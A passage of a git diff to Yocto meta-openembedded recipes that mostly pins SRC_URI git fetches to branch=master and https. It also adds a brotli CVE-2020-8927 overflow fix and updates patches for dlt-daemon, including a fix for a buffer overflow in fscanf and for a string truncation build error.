git://repo.or.cz/r/libjaylink.git;protocol=http;destsuffix=git/src/jtag/drivers/libjaylink;name=libjaylink \ + git://repo.or.cz/openocd.git;protocol=http;name=openocd;branch=master \ + git://repo.or.cz/r/git2cl.git;protocol=http;destsuffix=tools/git2cl;name=git2cl;branch=master \ + git://repo.or.cz/r/jimtcl.git;protocol=http;destsuffix=git/jimtcl;name=jimtcl;branch=master \ + git://repo.or.cz/r/libjaylink.git;protocol=http;destsuffix=git/src/jtag/drivers/libjaylink;name=libjaylink;branch=master \ file://0001-Do-not-include-syscrtl.h-with-glibc.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-devtools/pcimem/pcimem_2.0.bb b/meta-openembedded/meta-oe/recipes-devtools/pcimem/pcimem_2.0.bb index 107d5a8b72..84f6c3ce24 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/pcimem/pcimem_2.0.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/pcimem/pcimem_2.0.bb @@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=b234ee4d69f5fce4486a80fdaf4a4263" COMPATIBLE_HOST = "(x86_64|aarch64|arm)" SRCREV = "09724edb1783a98da2b7ae53c5aaa87493aabc9b" -SRC_URI = "git://github.com/billfarrow/pcimem.git " +SRC_URI = "git://github.com/billfarrow/pcimem.git;branch=master;protocol=https" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-devtools/perl/ipc-run_20180523.0.bb b/meta-openembedded/meta-oe/recipes-devtools/perl/ipc-run_20180523.0.bb index c812ae1374..03812e901b 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/perl/ipc-run_20180523.0.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/perl/ipc-run_20180523.0.bb @@ -9,7 +9,7 @@ LICENSE = "Artistic-1.0 | GPL-1.0+" LIC_FILES_CHKSUM = "file://LICENSE;md5=0ebd37caf53781e8b7223e6b99b63f4e" DEPENDS = "perl" -SRC_URI = "git://github.com/toddr/IPC-Run.git" +SRC_URI = "git://github.com/toddr/IPC-Run.git;branch=master;protocol=https" SRCREV = "0b409702490729eeb97ae65f5b94d949ec083134" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-devtools/perl/libdbd-mysql-perl_4.050.bb b/meta-openembedded/meta-oe/recipes-devtools/perl/libdbd-mysql-perl_4.050.bb index 049dc665dd..760c0ad0a5 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/perl/libdbd-mysql-perl_4.050.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/perl/libdbd-mysql-perl_4.050.bb @@ -15,7 +15,7 @@ DEPENDS += "libdev-checklib-perl-native libdbi-perl-native libmysqlclient" LIC_FILES_CHKSUM = "file://LICENSE;md5=d0a06964340e5c0cde88b7af611f755c" SRCREV = "9b5b70ea372f49fe9bc9e592dae3870596d1e3d6" -SRC_URI = "git://github.com/perl5-dbi/DBD-mysql.git;protocol=https" +SRC_URI = "git://github.com/perl5-dbi/DBD-mysql.git;protocol=https;branch=master" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-devtools/perl/libjson-perl_4.02000.bb b/meta-openembedded/meta-oe/recipes-devtools/perl/libjson-perl_4.02000.bb index 4e5a8a6ff2..29bc99e141 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/perl/libjson-perl_4.02000.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/perl/libjson-perl_4.02000.bb @@ -9,7 +9,7 @@ LIC_FILES_CHKSUM = "file://README;beginline=1171;endline=1176;md5=3be2cb8159d094 DEPENDS += "perl" -SRC_URI = "git://github.com/makamaka/JSON.git;protocol=https" +SRC_URI = "git://github.com/makamaka/JSON.git;protocol=https;branch=master" SRCREV = "42a6324df654e92419512cee80c0b49155d9e56d" diff --git a/meta-openembedded/meta-oe/recipes-devtools/ply/ply_git.bb b/meta-openembedded/meta-oe/recipes-devtools/ply/ply_git.bb index 7d693b36da..bf789488d7 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/ply/ply_git.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/ply/ply_git.bb @@ -5,7 +5,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" DEPENDS += "bison-native" -SRC_URI = "git://github.com/iovisor/ply" +SRC_URI = "git://github.com/iovisor/ply;branch=master;protocol=https" SRCREV = "aa5b9ac31307ec1acece818be334ef801c802a12" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-devtools/pmtools/pmtools_git.bb b/meta-openembedded/meta-oe/recipes-devtools/pmtools/pmtools_git.bb index 9afcbbb7f5..f605d2c90d 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/pmtools/pmtools_git.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/pmtools/pmtools_git.bb @@ -6,7 +6,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3" PV = "20130209+git${SRCPV}" -SRC_URI = "git://github.com/anyc/pmtools.git \ +SRC_URI = "git://github.com/anyc/pmtools.git;branch=master;protocol=https \ file://pmtools-switch-to-dynamic-buffer-for-huge-ACPI-table.patch \ " SRCREV = "3ebe0e54c54061b4c627236cbe35d820de2e1168" diff --git a/meta-openembedded/meta-oe/recipes-devtools/protobuf/protobuf-c_1.3.3.bb b/meta-openembedded/meta-oe/recipes-devtools/protobuf/protobuf-c_1.3.3.bb index ed8773443e..7bc1f23e70 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/protobuf/protobuf-c_1.3.3.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/protobuf/protobuf-c_1.3.3.bb @@ -14,7 +14,7 @@ DEPENDS = "protobuf-native protobuf" SRCREV = "f20a3fa131c275a0e795d99a28f94b4dbbb5af26" -SRC_URI = "git://github.com/protobuf-c/protobuf-c.git \ +SRC_URI = "git://github.com/protobuf-c/protobuf-c.git;branch=master;protocol=https \ file://0001-avoid-race-condition.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-devtools/protobuf/protobuf_3.11.4.bb b/meta-openembedded/meta-oe/recipes-devtools/protobuf/protobuf_3.11.4.bb index 4d6c5b2557..d2f22ba6b8 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/protobuf/protobuf_3.11.4.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/protobuf/protobuf_3.11.4.bb @@ -12,7 +12,7 @@ DEPENDS_append_class-target = " protobuf-native" SRCREV = "d0bfd5221182da1a7cc280f3337b5e41a89539cf" -SRC_URI = "git://github.com/google/protobuf.git;branch=3.11.x \ +SRC_URI = "git://github.com/google/protobuf.git;branch=3.11.x;protocol=https \ file://run-ptest \ file://0001-protobuf-fix-configure-error.patch \ file://0001-Makefile.am-include-descriptor.cc-when-building-libp.patch \ diff --git a/meta-openembedded/meta-oe/recipes-devtools/rapidjson/rapidjson_git.bb b/meta-openembedded/meta-oe/recipes-devtools/rapidjson/rapidjson_git.bb index 5b5c8b2570..04ac93e92e 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/rapidjson/rapidjson_git.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/rapidjson/rapidjson_git.bb @@ -4,7 +4,7 @@ SECTION = "libs" LICENSE = "MIT" LIC_FILES_CHKSUM = "file://license.txt;md5=ba04aa8f65de1396a7e59d1d746c2125" -SRC_URI = "git://github.com/miloyip/rapidjson.git;nobranch=1" +SRC_URI = "git://github.com/miloyip/rapidjson.git;nobranch=1;protocol=https" SRCREV = "0ccdbf364c577803e2a751f5aededce935314313" diff --git a/meta-openembedded/meta-oe/recipes-devtools/serialcheck/serialcheck_1.0.0.bb b/meta-openembedded/meta-oe/recipes-devtools/serialcheck/serialcheck_1.0.0.bb index cd5e0a4e5c..20cad69b53 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/serialcheck/serialcheck_1.0.0.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/serialcheck/serialcheck_1.0.0.bb @@ -3,7 +3,7 @@ HOMEPAGE = "http://git.breakpoint.cc/cgit/bigeasy/serialcheck.git/" LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" -SRC_URI = "git://git.breakpoint.cc/bigeasy/serialcheck.git \ +SRC_URI = "git://git.breakpoint.cc/bigeasy/serialcheck.git;branch=master \ file://0001-Add-option-to-enable-internal-loopback.patch \ file://0002-Restore-original-loopback-config.patch \ file://0001-Makefile-Change-order-of-link-flags.patch \ diff --git a/meta-openembedded/meta-oe/recipes-devtools/sqlite-orm/sqlite-orm_1.5.bb b/meta-openembedded/meta-oe/recipes-devtools/sqlite-orm/sqlite-orm_1.5.bb index 4a27e4b2a5..9d07405560 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/sqlite-orm/sqlite-orm_1.5.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/sqlite-orm/sqlite-orm_1.5.bb @@ -8,7 +8,7 @@ inherit cmake DEPENDS += "sqlite3" SRCREV = "e8a9e9416f421303f4b8970caab26dadf8bae98b" -SRC_URI = "git://github.com/fnc12/sqlite_orm;protocol=https" +SRC_URI = "git://github.com/fnc12/sqlite_orm;protocol=https;branch=master" S = "${WORKDIR}/git" EXTRA_OECMAKE += "-DSqliteOrm_BuildTests=OFF" diff --git a/meta-openembedded/meta-oe/recipes-devtools/tclap/tclap_1.2.2.bb b/meta-openembedded/meta-oe/recipes-devtools/tclap/tclap_1.2.2.bb index 46a9408031..3280dba49b 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/tclap/tclap_1.2.2.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/tclap/tclap_1.2.2.bb @@ -4,7 +4,7 @@ LICENSE = "MIT" LIC_FILES_CHKSUM = "file://COPYING;md5=0ca8b9c5c5445cfa7af7e78fd27e60ed" SRCREV = "75f440bcac1276c847f5351e14216f6e91def44d" -SRC_URI = "git://git.code.sf.net/p/tclap/code \ +SRC_URI = "git://git.code.sf.net/p/tclap/code;branch=master \ file://Makefile.am-disable-docs.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-devtools/uftrace/uftrace_0.9.4.bb b/meta-openembedded/meta-oe/recipes-devtools/uftrace/uftrace_0.9.4.bb index c33fa048cf..a78eecfea3 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/uftrace/uftrace_0.9.4.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/uftrace/uftrace_0.9.4.bb @@ -12,7 +12,7 @@ inherit autotools # v0.9.4 SRCREV = "d648bbffedef529220896283fb59e35531c13804" -SRC_URI = "git://github.com/namhyung/${BPN} \ +SRC_URI = "git://github.com/namhyung/${BPN};branch=master;protocol=https \ " S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-devtools/valijson/valijson_git.bb b/meta-openembedded/meta-oe/recipes-devtools/valijson/valijson_git.bb index c3254d16e7..5cff40752a 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/valijson/valijson_git.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/valijson/valijson_git.bb @@ -3,7 +3,7 @@ HOMEPAGE = "https://github.com/tristanpenman/valijson" LICENSE = "BSD-2-Clause" LIC_FILES_CHKSUM = "file://LICENSE;md5=015106c62262b2383f6c72063f0998f2" -SRC_URI = "git://github.com/tristanpenman/valijson.git" +SRC_URI = "git://github.com/tristanpenman/valijson.git;branch=master;protocol=https" PV = "0.1+git${SRCPV}" SRCREV = "c2f22fddf599d04dc33fcd7ed257c698a05345d9" diff --git a/meta-openembedded/meta-oe/recipes-devtools/xmlrpc-c/xmlrpc-c_1.51.03.bb b/meta-openembedded/meta-oe/recipes-devtools/xmlrpc-c/xmlrpc-c_1.51.03.bb index 6c31b69817..34df701260 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/xmlrpc-c/xmlrpc-c_1.51.03.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/xmlrpc-c/xmlrpc-c_1.51.03.bb @@ -5,7 +5,7 @@ HOMEPAGE = "http://xmlrpc-c.sourceforge.net/" LICENSE = "BSD & MIT" LIC_FILES_CHKSUM = "file://doc/COPYING;md5=aefbf81ba0750f02176b6f86752ea951" -SRC_URI = "git://github.com/mirror/xmlrpc-c.git \ +SRC_URI = "git://github.com/mirror/xmlrpc-c.git;branch=master;protocol=https \ file://0001-test-cpp-server_abyss-Fix-build-with-clang-libc.patch \ file://0002-fix-formatting-issues.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl_1.0.12.bb b/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl_1.0.12.bb index e112a5e30f..186f2c8ed0 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl_1.0.12.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl_1.0.12.bb @@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=da2e9aa80962d54e7c726f232a2bd1e8" # Use 1.0.12 tag SRCREV = "17b1790fb9c8abbb3c0f7e083864a6a014191d56" -SRC_URI = "git://github.com/lloyd/yajl;nobranch=1" +SRC_URI = "git://github.com/lloyd/yajl;nobranch=1;protocol=https" inherit cmake lib_package diff --git a/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl_2.1.0.bb b/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl_2.1.0.bb index d9a5821cbb..cf8dbb183e 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl_2.1.0.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl_2.1.0.bb @@ -8,7 +8,7 @@ HOMEPAGE = "http://lloyd.github.com/yajl/" LICENSE = "ISC" LIC_FILES_CHKSUM = "file://COPYING;md5=39af6eb42999852bdd3ea00ad120a36d" -SRC_URI = "git://github.com/lloyd/yajl" +SRC_URI = "git://github.com/lloyd/yajl;branch=master;protocol=https" SRCREV = "a0ecdde0c042b9256170f2f8890dd9451a4240aa" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-devtools/yasm/yasm_git.bb b/meta-openembedded/meta-oe/recipes-devtools/yasm/yasm_git.bb index 53856263f7..6aae29ad8c 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/yasm/yasm_git.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/yasm/yasm_git.bb @@ -9,7 +9,7 @@ DEPENDS += "flex-native bison-native xmlto-native" PV = "1.3.0+git${SRCPV}" # v1.3.0 SRCREV = "ba463d3c26c0ece2e797b8d6381b161633b5971a" -SRC_URI = "git://github.com/yasm/yasm.git" +SRC_URI = "git://github.com/yasm/yasm.git;branch=master;protocol=https" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-extended/brotli/brotli/0001-brotli-fix-CVE-2020-8927.patch b/meta-openembedded/meta-oe/recipes-extended/brotli/brotli/0001-brotli-fix-CVE-2020-8927.patch new file mode 100644 index 0000000000..c21794d147 --- /dev/null +++ b/meta-openembedded/meta-oe/recipes-extended/brotli/brotli/0001-brotli-fix-CVE-2020-8927.patch @@ -0,0 +1,44 @@ +From 95ab3786ce0f16e08e41f7bf216969a37dc86cad Mon Sep 17 00:00:00 2001 +From: Jan Kraemer +Date: Thu, 7 Oct 2021 12:48:04 +0200 +Subject: [PATCH] brotli: fix CVE-2020-8927 + +[No upstream tracking] -- + +This fixes a potential overflow when input chunk is >2GiB in +BrotliGetAvailableBits by capping the returned value to 2^30 + +Fixed in brotli version 1.0.8 +https://github.com/google/brotli as of commit id +223d80cfbec8fd346e32906c732c8ede21f0cea6 + +Patch taken from Debian Buster: 1.0.7-2+deb10u1 +http://deb.debian.org/debian/pool/main/b/brotli/brotli_1.0.7-2+deb10u1.dsc +https://security-tracker.debian.org/tracker/CVE-2020-8927 + + +Upstream-Status: Backported +CVE: CVE-2020-8927 + +Signed-off-by: Jan Kraemer +--- + c/dec/bit_reader.h | 5 ++++- + 1 file changed, 4 insertions(+), 1 deletion(-) + +diff --git a/c/dec/bit_reader.h b/c/dec/bit_reader.h +index c06e914..0d20312 100644 +--- a/c/dec/bit_reader.h ++++ b/c/dec/bit_reader.h +@@ -87,8 +87,11 @@ static BROTLI_INLINE uint32_t BrotliGetAvailableBits( + } + + /* Returns amount of unread bytes the bit reader still has buffered from the +- BrotliInput, including whole bytes in br->val_. */ ++ BrotliInput, including whole bytes in br->val_. Result is capped with ++ maximal ring-buffer size (larger number won't be utilized anyway). */ + static BROTLI_INLINE size_t BrotliGetRemainingBytes(BrotliBitReader* br) { ++ static const size_t kCap = (size_t)1 << 30; ++ if (br->avail_in > kCap) return kCap; + return br->avail_in + (BrotliGetAvailableBits(br) >> 3); + } + diff --git a/meta-openembedded/meta-oe/recipes-extended/brotli/brotli_1.0.7.bb b/meta-openembedded/meta-oe/recipes-extended/brotli/brotli_1.0.7.bb index 70dbcaffb1..77fef778a4 100644 --- a/meta-openembedded/meta-oe/recipes-extended/brotli/brotli_1.0.7.bb +++ b/meta-openembedded/meta-oe/recipes-extended/brotli/brotli_1.0.7.bb @@ -6,7 +6,9 @@ BUGTRACKER = "https://github.com/google/brotli/issues" LICENSE = "MIT" LIC_FILES_CHKSUM = "file://${S}/LICENSE;md5=941ee9cd1609382f946352712a319b4b" -SRC_URI = "git://github.com/google/brotli.git" +SRC_URI = "git://github.com/google/brotli.git;branch=master;protocol=https \ + file://0001-brotli-fix-CVE-2020-8927.patch \ + " # tag 1.0.7 SRCREV= "d6d98957ca8ccb1ef45922e978bb10efca0ea541" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-extended/cmpi-bindings/cmpi-bindings_1.0.1.bb b/meta-openembedded/meta-oe/recipes-extended/cmpi-bindings/cmpi-bindings_1.0.1.bb index 6c71d534be..388feb703b 100644 --- a/meta-openembedded/meta-oe/recipes-extended/cmpi-bindings/cmpi-bindings_1.0.1.bb +++ b/meta-openembedded/meta-oe/recipes-extended/cmpi-bindings/cmpi-bindings_1.0.1.bb @@ -6,7 +6,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b19ee058d2d5f69af45da98051d91064" SECTION = "Development/Libraries" DEPENDS = "swig-native python3 sblim-cmpi-devel" -SRC_URI = "git://github.com/kkaempf/cmpi-bindings.git;protocol=http \ +SRC_URI = "git://github.com/kkaempf/cmpi-bindings.git;protocol=http;branch=master;protocol=https \ file://cmpi-bindings-0.4.17-no-ruby-perl.patch \ file://cmpi-bindings-0.4.17-sblim-sigsegv.patch \ file://cmpi-bindings-0.9.5-python-lib-dir.patch \ diff --git a/meta-openembedded/meta-oe/recipes-extended/dlt-daemon/dlt-daemon/204.patch b/meta-openembedded/meta-oe/recipes-extended/dlt-daemon/dlt-daemon/204.patch deleted file mode 100644 index f0fc0bcb2c..0000000000 --- a/meta-openembedded/meta-oe/recipes-extended/dlt-daemon/dlt-daemon/204.patch +++ /dev/null @@ -1,148 +0,0 @@ -Upstream-Status: Submitted [https://github.com/GENIVI/dlt-daemon/pull/204] -From 92830aff6e91041f574753d78da758c62981d9a4 Mon Sep 17 00:00:00 2001 -From: Gianfranco Costamagna -Date: Sat, 25 Jan 2020 09:08:07 +0100 -Subject: [PATCH 1/3] dlt_user.h: fix build when musl is the libc - implementation, by adding a missing include for pthread_t reference: - -see https://errors.yoctoproject.org/Errors/Details/308000/ for details - -Thanks Khem Raj for the report - -Signed-off-by: Gianfranco Costamagna -Signed-off-by: Gianfranco Costamagna ---- - include/dlt/dlt_user.h | 1 + - 1 file changed, 1 insertion(+) - -diff --git a/include/dlt/dlt_user.h b/include/dlt/dlt_user.h -index 69cb854..766d349 100644 ---- a/include/dlt/dlt_user.h -+++ b/include/dlt/dlt_user.h -@@ -74,6 +74,7 @@ - \{ - */ - # include -+# include - - # if !defined (__WIN32__) - # include - -From 5f67aba02c12b7446e63ccc86285c13bc5c7a432 Mon Sep 17 00:00:00 2001 -From: Gianfranco Costamagna -Date: Sat, 25 Jan 2020 09:16:14 +0100 -Subject: [PATCH 2/3] dlt-test-init-free: fix build failure with strict - compiler flags, due to uint being undefined. This is actually an "int" type, - looking at the test implementation - -Signed-off-by: Gianfranco Costamagna -Signed-off-by: Gianfranco Costamagna ---- - src/tests/dlt-test-init-free.c | 4 ++-- - 1 file changed, 2 insertions(+), 2 deletions(-) - -diff --git a/src/tests/dlt-test-init-free.c b/src/tests/dlt-test-init-free.c -index 96b5245..35b8803 100644 ---- a/src/tests/dlt-test-init-free.c -+++ b/src/tests/dlt-test-init-free.c -@@ -32,7 +32,7 @@ - - void exec(const char *cmd, char *buffer, size_t length); - void printMemoryUsage(); --char *occupyMemory(uint size); -+char *occupyMemory(int size); - void do_example_test(); - void do_dlt_test(); - -@@ -131,7 +131,7 @@ void printMemoryUsage() - printf("%s", result); - } - --char *occupyMemory(uint size) -+char *occupyMemory(int size) - { - char *buf = (char *)malloc(size * sizeof(char)); - - -From c790d61fad382e5d3e648ee99904087eb9bc4a77 Mon Sep 17 00:00:00 2001 -From: Gianfranco Costamagna -Date: Sat, 25 Jan 2020 09:20:48 +0100 -Subject: [PATCH 3/3] sys/poll.h: deprecate old sys/poll.h include header, now - glibc/musl wants poll.h being included directly. This fixes a build failure - on musl systems with strict c hardening flags - -Signed-off-by: Gianfranco Costamagna -Signed-off-by: Gianfranco Costamagna ---- - src/console/logstorage/dlt-logstorage-ctrl.c | 2 +- - src/daemon/dlt_daemon_event_handler.c | 2 +- - src/daemon/dlt_daemon_event_handler.h | 2 +- - src/daemon/dlt_daemon_event_handler_types.h | 2 +- - src/lib/dlt_user.c | 2 +- - 5 files changed, 5 insertions(+), 5 deletions(-) - -diff --git a/src/console/logstorage/dlt-logstorage-ctrl.c b/src/console/logstorage/dlt-logstorage-ctrl.c -index 525c137..6614f44 100644 ---- a/src/console/logstorage/dlt-logstorage-ctrl.c -+++ b/src/console/logstorage/dlt-logstorage-ctrl.c -@@ -61,7 +61,7 @@ - #include - #include - --#include -+#include - - #if defined(__linux__) - # include "sd-daemon.h" -diff --git a/src/daemon/dlt_daemon_event_handler.c b/src/daemon/dlt_daemon_event_handler.c -index 1611f7b..0d463da 100644 ---- a/src/daemon/dlt_daemon_event_handler.c -+++ b/src/daemon/dlt_daemon_event_handler.c -@@ -30,7 +30,7 @@ - #include - #include - --#include -+#include - #include - - #include "dlt_common.h" -diff --git a/src/daemon/dlt_daemon_event_handler.h b/src/daemon/dlt_daemon_event_handler.h -index eb96101..bd550d3 100644 ---- a/src/daemon/dlt_daemon_event_handler.h -+++ b/src/daemon/dlt_daemon_event_handler.h -@@ -25,7 +25,7 @@ - * \file dlt_daemon_event_handler.h - */ - --#include -+#include - - #include "dlt_daemon_connection_types.h" - #include "dlt_daemon_event_handler_types.h" -diff --git a/src/daemon/dlt_daemon_event_handler_types.h b/src/daemon/dlt_daemon_event_handler_types.h -index 370e503..0b16d08 100644 ---- a/src/daemon/dlt_daemon_event_handler_types.h -+++ b/src/daemon/dlt_daemon_event_handler_types.h -@@ -25,7 +25,7 @@ - * \file dlt_daemon_event_handler_types.h - */ - --#include -+#include - - #include "dlt_daemon_connection_types.h" - -#diff --git a/src/lib/dlt_user.c b/src/lib/dlt_user.c -#index ffa9b09..511f991 100644 -#--- a/src/lib/dlt_user.c -#+++ b/src/lib/dlt_user.c -#@@ -43,7 +43,7 @@ -# #include -# -# #include /* writev() */ -#-#include -#+#include -# -# #include -# #ifdef linux diff --git a/meta-openembedded/meta-oe/recipes-extended/dlt-daemon/dlt-daemon/275.patch b/meta-openembedded/meta-oe/recipes-extended/dlt-daemon/dlt-daemon/275.patch deleted file mode 100644 index 75065eb054..0000000000 --- a/meta-openembedded/meta-oe/recipes-extended/dlt-daemon/dlt-daemon/275.patch +++ /dev/null @@ -1,38 +0,0 @@ -Upstream-status: Backport -CVE: CVE-2020-29394 -From 7f5cd5404a03fa330e192084f6bdafb2dc9bdcb7 Mon Sep 17 00:00:00 2001 -From: GwanYeong Kim -Date: Sat, 28 Nov 2020 12:24:46 +0900 -Subject: [PATCH] dlt_common: Fix buffer overflow in dlt_filter_load - -A buffer overflow in the dlt_filter_load function in dlt_common.c in dlt-daemon allows arbitrary code execution via an unsafe usage of fscanf, because it does not limit the number of characters to be read in a format argument. - -Fixed: #274 - -Signed-off-by: GwanYeong Kim ---- - src/shared/dlt_common.c | 4 ++-- - 1 file changed, 2 insertions(+), 2 deletions(-) - -diff --git a/src/shared/dlt_common.c b/src/shared/dlt_common.c -index 254f4ce4..d15b1cec 100644 ---- a/src/shared/dlt_common.c -+++ b/src/shared/dlt_common.c -@@ -404,7 +404,7 @@ DltReturnValue dlt_filter_load(DltFilter *filter, const char *filename, int verb - while (!feof(handle)) { - str1[0] = 0; - -- if (fscanf(handle, "%s", str1) != 1) -+ if (fscanf(handle, "%254s", str1) != 1) - break; - - if (str1[0] == 0) -@@ -419,7 +419,7 @@ DltReturnValue dlt_filter_load(DltFilter *filter, const char *filename, int verb - - str1[0] = 0; - -- if (fscanf(handle, "%s", str1) != 1) -+ if (fscanf(handle, "%254s", str1) != 1) - break; - - if (str1[0] == 0) diff --git a/meta-openembedded/meta-oe/recipes-extended/dlt-daemon/dlt-daemon/317.patch b/meta-openembedded/meta-oe/recipes-extended/dlt-daemon/dlt-daemon/317.patch new file mode 100644 index 0000000000..fe40334b65 --- /dev/null +++ b/meta-openembedded/meta-oe/recipes-extended/dlt-daemon/dlt-daemon/317.patch @@ -0,0 +1,43 @@ +Origin: https://github.com/GENIVI/dlt-daemon/pull/317 +From 55d31216823841a1547fe261cdf8e3b1002d5f94 Mon Sep 17 00:00:00 2001 +From: Gianfranco Costamagna +Date: Thu, 1 Jul 2021 12:58:20 +0200 +Subject: [PATCH] dlt-control-common.c: Fix build failure due to out-of-bound + write -Werror=stringop-truncation + +cd /build/dlt-daemon-2.18.7/obj-x86_64-linux-gnu/src/console/logstorage && /usr/bin/cc -DCONFIGURATION_FILES_DIR=\"/etc\" -DDLT_DAEMON_USE_FIFO_IPC -DDLT_LIB_USE_FIFO_IPC -DDLT_NETWORK_TRACE_ENABLE -DDLT_SYSTEMD_ENABLE -DDLT_SYSTEMD_JOURNAL_ENABLE -DDLT_UNIT_TESTS -DDLT_USER_IPC_PATH=\"/tmp\" -DDLT_USE_IPv6 -DEXTENDED_FILTERING -D_GNU_SOURCE -I/build/dlt-daemon-2.18.7 -I/build/dlt-daemon-2.18.7/obj-x86_64-linux-gnu/include/dlt -I/build/dlt-daemon-2.18.7/include/dlt -I/build/dlt-daemon-2.18.7/src/shared -I/build/dlt-daemon-2.18.7/src/core_dump_handler -I/build/dlt-daemon-2.18.7/src/offlinelogstorage -I/build/dlt-daemon-2.18.7/src/lib -I/build/dlt-daemon-2.18.7/src/daemon -I/build/dlt-daemon-2.18.7/src/console -I/build/dlt-daemon-2.18.7/src/gateway -I/build/dlt-daemon-2.18.7/systemd/3rdparty -g -O2 -ffile-prefix-map=/build/dlt-daemon-2.18.7=. -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -Werror -std=gnu99 -Wall -Wextra -Wno-variadic-macros -Wno-strict-aliasing -o CMakeFiles/dlt-logstorage-ctrl.dir/__/dlt-control-common.c.o -c /build/dlt-daemon-2.18.7/src/console/dlt-control-common.c +make[3]: Leaving directory '/build/dlt-daemon-2.18.7/obj-x86_64-linux-gnu' +In file included from /usr/include/string.h:495, + from /build/dlt-daemon-2.18.7/src/console/dlt-control-common.c:56: +In function 'strncpy', + inlined from 'dlt_json_filter_load' at /build/dlt-daemon-2.18.7/src/console/dlt-control-common.c:716:13: +/usr/include/x86_64-linux-gnu/bits/string_fortified.h:106:10: error: '__builtin_strncpy' specified bound 4 equals destination size [-Werror=stringop-truncation] + 106 | return __builtin___strncpy_chk (__dest, __src, __len, __bos (__dest)); + | ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +In function 'strncpy', + inlined from 'dlt_json_filter_load' at /build/dlt-daemon-2.18.7/src/console/dlt-control-common.c:721:13: +/usr/include/x86_64-linux-gnu/bits/string_fortified.h:106:10: error: '__builtin_strncpy' specified bound 4 equals destination size [-Werror=stringop-truncation] + 106 | return __builtin___strncpy_chk (__dest, __src, __len, __bos (__dest)); + | ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Signed-off-by: Gianfranco Costamagna +Signed-off-by: Gianfranco Costamagna +--- + src/console/dlt-control-common.c | 4 ++-- + 1 file changed, 2 insertions(+), 2 deletions(-) + +diff --git a/src/console/dlt-control-common.c b/src/console/dlt-control-common.c +index 8a9d29f0..f58d8268 100644 +--- a/src/console/dlt-control-common.c ++++ b/src/console/dlt-control-common.c +@@ -671,8 +671,8 @@ DltReturnValue dlt_json_filter_load(DltFilter *filter, const char *filename, int + struct json_object *j_payload_max; + enum json_tokener_error jerr; + +- char app_id[DLT_ID_SIZE] = ""; +- char context_id[DLT_ID_SIZE] = ""; ++ char app_id[DLT_ID_SIZE + 1] = ""; ++ char context_id[DLT_ID_SIZE + 1] = ""; + int32_t log_level = 0; + int32_t payload_max = INT32_MAX; + int32_t payload_min = 0; diff --git a/meta-openembedded/meta-oe/recipes-extended/dlt-daemon/dlt-daemon_2.18.4.bb b/meta-openembedded/meta-oe/recipes-extended/dlt-daemon/dlt-daemon_2.18.4.bb deleted file mode 100644 index 45724e98ac..0000000000 --- a/meta-openembedded/meta-oe/recipes-extended/dlt-daemon/dlt-daemon_2.18.4.bb +++ /dev/null @@ -1,63 +0,0 @@ -SUMMARY = "Diagnostic Log and Trace" -DESCRIPTION = "This component provides a standardised log and trace 